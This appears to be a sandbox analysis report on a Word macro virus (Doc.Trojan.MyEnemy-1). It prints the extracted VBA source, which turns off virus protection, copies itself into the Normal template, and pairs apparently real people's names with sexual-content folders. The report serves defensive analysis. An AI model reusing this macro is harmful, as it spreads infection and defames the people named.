Verdict: MALICIOUS
Risk Score: 120
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.MyEnemy-1'. It contains VBA macros, specifically a 'Document_Open' macro, which is a common technique for executing malicious code when the document is opened. The script appears to be designed to copy itself to the Normal template and potentially download or execute further malicious content, although the exact payload mechanism is obfuscated.
Heuristics (3)
- ClamAV: Doc.Trojan.MyEnemy-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.MyEnemy-1
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 21361 bytes |

SHA-256: 65af0c66c09a906944dedcba0de105c40647942a05a20a67c5bd70dd04216fd5
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim acd, ntt As Object
Dim MyEnemy$(20, 1)
Dim MyPhoto$(10)
Dim MyVideo$(6)
Dim MyExten$(5)
Dim zw As Byte
Const mrk = "čó ŕčŕ čŕĺńč îňâđů îçęç îčńđâéŔ .ÂđńíďńíÔíđâęěń îŕččď ŕŕóĘěńŕîî .Â"
Private Sub document_open()
    On Error Resume Next
    Options.VirusProtection = False
    Set acd = ActiveDocument.VBProject.VBComponents.Item(1)
    Set ntt = NormalTemplate.VBProject.VBComponents.Item(1)
    If Not acd.codemodule.Find(mrk, 1, 1, 1000, 1000) Then acd.codemodule.deletelines 1, acd.codemodule.countoflines
    If Not ntt.codemodule.Find(mrk, 1, 1, 1000, 1000) Then ntt.codemodule.deletelines 1, ntt.codemodule.countoflines
End Sub
Private Sub document_close()
    On Error Resume Next
    Options.VirusProtection = False
    Set acd = ActiveDocument.VBProject.VBComponents.Item(1)
    Set ntt = NormalTemplate.VBProject.VBComponents.Item(1)
    s$ = ""
    If (acd.codemodule.countoflines <= 1) And ((ActiveDocument.SaveFormat = wdFormatDocument) Or (ActiveDocument.SaveFormat = wdFormatTemplate)) Then
        v2 = 1
        For v = 1 To ntt.codemodule.countoflines
            s$ = ntt.codemodule.lines(v, 1)
            If s$ <> "" Then
                acd.codemodule.insertlines v2, s$
                v2 = v2 + 1
            End If
        Next v
    End If
    ActiveDocument.Save
    If ntt.codemodule.countoflines <= 1 Then
        v2 = 1
        For v = 1 To acd.codemodule.countoflines
            s$ = acd.codemodule.lines(v, 1)
            If s$ <> "" Then
                ntt.codemodule.insertlines v2, s$
                v2 = v2 + 1
            End If
        Next v
    End If
    NormalTemplate.Save
    'Retaliate
    MyEnemy$(0, 0) = "Ôđîëîâ Î. Ŕ."
    MyEnemy$(1, 0) = "Ĺěĺëü˙íĺíęî Â. Â."
    MyEnemy$(2, 0) = "Ďîäăîđíîâŕ Ĺ. Č."
    MyEnemy$(3, 0) = "Ěŕňđîńîâŕ Îëüăŕ Ĺâăĺíüĺâíŕ"
    MyEnemy$(4, 0) = "Ęîâŕëĺâŕ Î Ţ"
    MyEnemy$(5, 0) = "Ěîńčí Ę. Ď."
    MyEnemy$(6, 0) = "Řŕëűăčí Ď. Ń."
    MyEnemy$(7, 0) = "Ëčőňĺđ Ŕíŕňîëčé Ěčőŕéëîâč÷"
    MyEnemy$(8, 0) = "Ŕ. Ě. Ęŕđďîâ"
    MyEnemy$(9, 0) = "Ęîçëîâ Ŕíäđĺé Ŕëĺęńŕíäđîâč÷"
    MyEnemy$(10, 0) = "Ďŕâëîâŕ Îëüăŕ"
    MyEnemy$(11, 0) = "Äěčňđčĺâ Ńĺđăĺé"
    MyEnemy$(12, 0) = "Bob Klein"
    MyEnemy$(13, 0) = "Jim Rein"
    MyEnemy$(14, 0) = "John A. Hopkins"
    MyEnemy$(15, 0) = "Garry Wood"
    MyEnemy$(17, 0) = "Debra Henriksen"
    MyEnemy$(18, 0) = "Patricia "
    MyEnemy$(19, 0) = "Hitler"
    For v = 0 To 19
        If (v <= 11) Or (v = 19) Then
            MyEnemy$(v, 1) = "C:\Ěîč äîęóěĺíňű"
        Else
            MyEnemy$(v, 1) = "C:\My documents"
        End If
    Next v
    MyEnemy$(0, 1) = MyEnemy$(0, 1) + "\Ňđŕőŕíüĺ\"
    MyEnemy$(1, 1) = MyEnemy$(1, 1) + "\Ďîđíî\"
    MyEnemy$(2, 1) = MyEnemy$(2, 1) + "\Ńĺęń\"
    MyEnemy$(3, 1) = MyEnemy$(3, 1) + "\Čçâđŕůĺíč˙\"
    MyEnemy$(4, 1) = MyEnemy$(4, 1) + "\Ňđŕő\"
    MyEnemy$(5, 1) = MyEnemy$(5, 1) + "\Ęëóáíč÷ęŕ\"
    MyEnemy$(6, 1) = MyEnemy$(6, 1) + "\Äĺâóřęč\Ăĺë˙\"
    MyEnemy$(7, 1) = MyEnemy$(7, 1) + "\Ôîňęč äĺâóřĺę\Ęîěčńńŕđîâŕ Ŕíăĺëčíŕ Âčňŕëüĺâíŕ\"
    MyEnemy$(8, 1) = "C:\Ňîëüęî äë˙ ěĺí˙\Ďîđíóőŕ\Ăĺëęŕ\"
    MyEnemy$(9, 1) = MyEnemy$(9, 1) + "\Îáíŕćĺííŕ˙ íŕňóđŕ\Ŕíăĺëčíŕ\"
    MyEnemy$(10, 1) = MyEnemy$(10, 1) + "\Ńĺęń_ęîëëĺęöč˙\Ęîěčńńŕđîâŕ_Ŕ_Â\"
    MyEnemy$(11, 1) = MyEnemy$(11, 1) + "\Ëó÷řčĺ ďîďęč ăîđîäŕ\"
    MyEnemy$(12, 1) = MyEnemy$(12, 1) + "\Russian Porno\"
    MyEnemy$(13, 1) = MyEnemy$(13, 1) + "\Russian Girls\Comissarova\"
    MyEnemy$(14, 1) = MyEnemy$(14, 1) + "\Russian Fuck\Gelka"
    MyEnemy$(15, 1) = MyEnemy$(15, 1) + "\Nudo\G\"
    MyEnemy$(16, 1) = MyEnemy$(16, 1) + "\Sex Show 1\Gela\"
    MyEnemy$(17, 1) = MyEnemy$(17, 1) + "\Sex Collection\"
    MyEnemy$(18, 1) = MyEnemy$(18, 1) + "\Crazy Sex\"
    MyEnemy$(19, 1) = MyEnemy$(19, 1) + "\Âűńňŕâęŕ ńĺęńŕ\Đîńńč˙\Ŕńňđŕőŕíü\"
    MyPhoto$(0) = "Angelina"
    MyPhoto$(1) = "Gela"
    MyPhoto$(2) = "Body_A"
    MyPhoto$(3) = "Fuck"
    MyPhoto$(4) = "Fuck_ass"
    MyPhoto$(5) = "Ass"
    MyPhoto$(6) = "Cnt"
    MyPhoto$(7) = "Klzm"
    MyPhoto$(8) = "Kk"
    MyPhoto$(9) = "Urn"
    MyVideo$(0) = "Gela&Seryj"
    MyVideo$(1) = "Gela&Vlad"
    MyVideo$(2) = "Gela&Tolj
```

... (truncated)